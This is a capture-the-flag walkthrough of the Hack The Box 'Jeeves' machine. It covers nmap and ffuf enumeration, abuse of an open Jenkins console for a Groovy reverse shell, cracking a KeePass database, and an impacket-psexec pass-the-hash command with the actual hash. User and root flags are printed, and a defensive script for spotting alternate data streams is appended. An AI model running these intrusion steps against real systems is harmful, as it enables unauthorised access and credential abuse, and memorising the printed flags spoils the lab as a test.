Setup
mkdir -p ~/ctf/HackTheBox/jeeves/scans; cd ~/ctf/HackTheBox/jeeves
IP Address: 10.10.10.63
echo "10.10.10.63 jeeves.htb" | sudo tee -a /etc/hosts
10.10.10.63 jeeves.htb
Enumeration
nmap -sC -sV -Pn -p- jeeves.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 jeeves.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4h36m57s, deviation: 0s, median: 4h36m57s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2025-07-10T21:55:52
|_ start_date: 2025-07-09T13:45:29
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 55172/tcp): CLEAN (Timeout)
| Check 2 (port 10973/tcp): CLEAN (Timeout)
| Check 3 (port 48293/udp): CLEAN (Timeout)
| Check 4 (port 58629/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
ffuf -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt:ff -u http://jeeves.htb:50000/ff -o scans/ffuf_dir
# FFUF dir search findings
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://jeeves.htb:50000/ff
:: Wordlist : ff: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
:: Output file : scans/ffuf_dir
:: File format : json
:: Follow redirects : true
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
askjeeves [Status: 200, Size: 13399, Words: 585, Lines: 18, Duration: 7430ms]
So port 80 serves the main website, and port 50000 hosts Jenkins for CI/CD.
On jeeves.htb:50000/askjeeves we see an unrestricted Jenkins instance where we can create projects that execute arbitrary commands and even run Groovy scripts in Jenkins.
Using https://www.revshells.com/ we generate a Groovy script to get a reverse shell.
User Flag
Location: C:\Users\kohsuke\Desktop\user.txt | Flag: e3232272596fb47950d59c4cf1e7066a
Privilege Escalation
We find a KeePass database in the Documents folder of the user kohsuke.
Using impacket-smbserver share . -smb2support
we open an SMB share, which makes it easy to transfer files between the box and our host. From the reverse shell we connect to our SMB server and copy the file over.
Using keepass2john CEH.kdbx > hash
we first extract the hash for the database, then crack the password using john and the rockyou wordlist.
Using KeeWeb we open the KeePass database.
In Backup Stuff there is a hash, e0fb1fb85756c24235ff238cbe81fe00,
which works when tried with the username administrator.
Using impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 -target-ip 10.10.10.63 administrator@jeeves.htb
we get a shell.
There is a file hm.txt which says to look deeper for the flag.
When we check with dir /r (which lists alternate data streams), we see root.txt.
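The same dir /r listing is what a defender would review to spot data tucked into alternate streams. The following is an added example, not part of the original write-up: it parses dir /r output and reports named streams that are not on an expected list. The sample listing is constructed (dates, sizes and the extra files are made up), and the function names are hypothetical.

```python
import re

# Constructed sample of `dir /r` output: dates, sizes and the extra files are
# made up; hm.txt and its root.txt stream follow the write-up.
SAMPLE = r"""
 Directory of C:\Users\Administrator\Desktop

01/01/2024  10:00 AM    <DIR>          .
01/01/2024  10:00 AM    <DIR>          ..
01/01/2024  10:05 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
01/01/2024  10:07 AM               797 setup.lnk
01/01/2024  10:09 AM             1,024 report.pdf
                                    26 report.pdf:Zone.Identifier:$DATA
"""

# A stream line has no date/time columns: only a size and name:stream:$DATA.
STREAM_RE = re.compile(r"^\s+([\d,.]+)\s+(.+?):([^:\\]+):\$DATA\s*$")

# Streams Windows itself commonly writes (assumption: tune per environment).
EXPECTED_STREAMS = {"Zone.Identifier"}


def find_alternate_streams(dir_r_output):
    """Return (file, stream, size) for every named stream in `dir /r` output."""
    found = []
    for line in dir_r_output.splitlines():
        m = STREAM_RE.match(line)
        if m:
            # Sizes may carry locale thousands separators such as 1,024.
            size = int(re.sub(r"[,.]", "", m.group(1)))
            found.append((m.group(2), m.group(3), size))
    return found


def unexpected_streams(dir_r_output):
    """Drop streams in EXPECTED_STREAMS, leaving the ones worth reviewing."""
    return [s for s in find_alternate_streams(dir_r_output)
            if s[1] not in EXPECTED_STREAMS]


if __name__ == "__main__":
    for name, stream, size in unexpected_streams(SAMPLE):
        print(f"{name} carries hidden stream '{stream}' ({size} bytes)")
```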
Root Flag
Location: C:\Users\Administrator\Desktop | Flag: afbc5bd4b615a60648cec41c6ac92530